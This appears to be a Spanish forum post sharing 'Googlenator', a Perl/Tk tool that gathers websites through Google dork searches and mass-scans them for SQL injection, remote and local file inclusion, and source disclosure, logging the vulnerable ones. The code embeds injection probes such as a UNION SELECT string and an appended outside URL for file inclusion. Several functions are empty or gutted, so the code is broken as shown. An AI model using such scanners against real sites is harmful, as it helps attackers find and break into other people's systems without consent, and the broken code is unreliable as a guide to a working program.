- SQLI
- RFI
- LFI
- Full Source Discloure
Tambien pueden buscar en google string en google con , los resultados
son guardados en una carpeta que el programa instalar al ejecutarse
Código
#!usr/bin/perl #Googlenator (C) Doddy Hackman 2011 use Tk; use Tk::ROText; use Tk::FileSelect; use Cwd; use WWW::Mechanize; if ($^O eq 'MSWin32') { use Win32::Console; Win32::Console::Free(); } my $nave = WWW::Mechanize->new(autocheck => 0); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"); installer(); my $new = MainWindow->new(-background=>"black"); $new->title("Googlenator (C) Doddy Hackman 2011"); $new->geometry("780x530"); $new->resizable(0,0); $d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan"); my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left"); my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left"); $d->pack(-side=>"top",-fill=>"x"); $scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql); $scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi); $scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi); $scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd); $logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle); $logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql); $logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi); $logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi); $logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd); my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60); head(); $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20"); my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385"); $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300"); my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354"); $new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450"); my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505"); $new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450"); $new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474"); $new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498"); MainLoop; head(); sub googler { my $google = $google->get; my $pages = $pages->get; my $dorks = $dorks->get; head(); $box->insert("end","\t\t[+] Searching pages with string $dorks\n\n"); my @webas = google($google,$dorks,$pages); $box->insert("end","\t\t[+] Cleaning\n\n"); for(@webas) { $new->update(); $box->insert("end","\t\t[Link] : ".$_."\n"); savefile($dorks.".txt",$_); } $box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n"); $box->insert("end","\t\t[+] Finished\n\n"); } sub loadsql { $browse = $new->FileSelect(-directory => "/"); my $filea = $browse->Show; head(); $box->insert("end","\t\t[+] File : $filea\n"); @words = <FILE>; close FILE; for my $page(@words) { my $page = clean($page); $new->update(); scansql($page); } sub scansql { my ($pass1,$pass2) = ("+","--"); $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { $box->insert("end","\t\t[+] SQLI : $page\n"); savefilevul("sql-logs.txt",$page); }}} sub loadrfi { $browse = $new->FileSelect(-directory => "/"); my $filea = $browse->Show; head(); $box->insert("end","\t\t[+] File : $filea\n"); @words = <FILE>; close FILE; for my $page(@words) { my $page = clean($page); $new->update(); scanrfi($page); } sub scanrfi { $code1 = toma($page."http:/www.supertangas.com/"); if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD $box->insert("end","\t\t[+] RFI : $page\n"); savefilevul("rfi-logs.txt",$page); }}} sub loadlfi { $browse = $new->FileSelect(-directory => "/"); my $filea = $browse->Show; head(); $box->insert("end","\t\t[+] File : $filea\n"); @words = <FILE>; close FILE; for my $page(@words) { my $page = clean($page); $new->update(); scanlfi($page); } sub scanlfi { $code1 = toma($page."'"); if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { $box->insert("end","\t\t[+] LFI : $page\n"); savefilevul("lfi-logs.txt",$page); }}} sub loadfsd { $browse = $new->FileSelect(-directory => "/"); my $filea = $browse->Show; head(); $box->insert("end","\t\t[+] File : $filea\n"); @words = <FILE>; close FILE; for my $page(@words) { my $page = clean($page); $new->update(); scanfsd($page); } sub scanfsd { my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $me = $1; $code1 = toma($page.$me); if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) { $box->insert("end","\t\t[+] Full Source Discloure : $page\n"); savefilevul("fsd-logs.txt",$page); }}}} sub head { $box->delete("0.0","end"); $box->insert("end"," @@@@ @@@ @@@ @@@@ @@ @@@@ @@ @@ @@ @@@@@@ @@@ @@@@ @@@@@ @@@@@ @@@@@ @@@@@ @@ @@ @@@ @@ @@ @@ @@@@@ @@ @@ @@@ @@ @@ @@ @@ @@@ @@ @@ @@@@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@@ @@ @@ @@ @@ @@ @@@ @@ @@@@ @@ @ @@ @ @ @@ @@ @@ @@@@ @@@ @@ @@ @@ @@ @@ @@@ @@ @@ @@ @@ @@@@ @@@@@@ @@ @@ @@ @@@@ @@@@@ @@@@@ @@@@@ @@@@@ @@ @@ @@ @@@ @@ @@ @@ @@@@@ @@ @@ @@@ @@@ @@@ @@@ @@@@ @@@@ @@ @@ @@ @@ @@ @@@ @@ @@ "); } sub about { $about = MainWindow->new(-background=>"black"); $about->title("Googlenator v0.3"); $about->geometry("300x110"); $about->resizable(0,0); $about->Label(-background=>"black",-foreground=>"cyan")->pack(); $about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack(); $about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack(); $about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack(); } sub exitx { } sub savefilevul { close SAVE; } sub toma { } sub dame_link { } sub clean { if ($_[0] =~/\=/) { } } sub savefile { close SAVE; } sub google { for ($pages=10;$pages<=$_[2];$pages=$pages+10) { $new->update(); toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages"); @links = dame_link(); for my $l(@links) { if ($l->url() =~/webcache.googleusercontent.com/) { } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { } } my @founds = repes(@founds); } sub installer { unless (-d "logs/") { } } sub repes { foreach my $palabra ( @_ ) { next if $repety{ $palabra }++; } } sub loadgoogle { } sub loadfilesql { } sub loadfilelfi { } sub loadfilerfi { } sub loadfilefsd { } # ¿ The End ?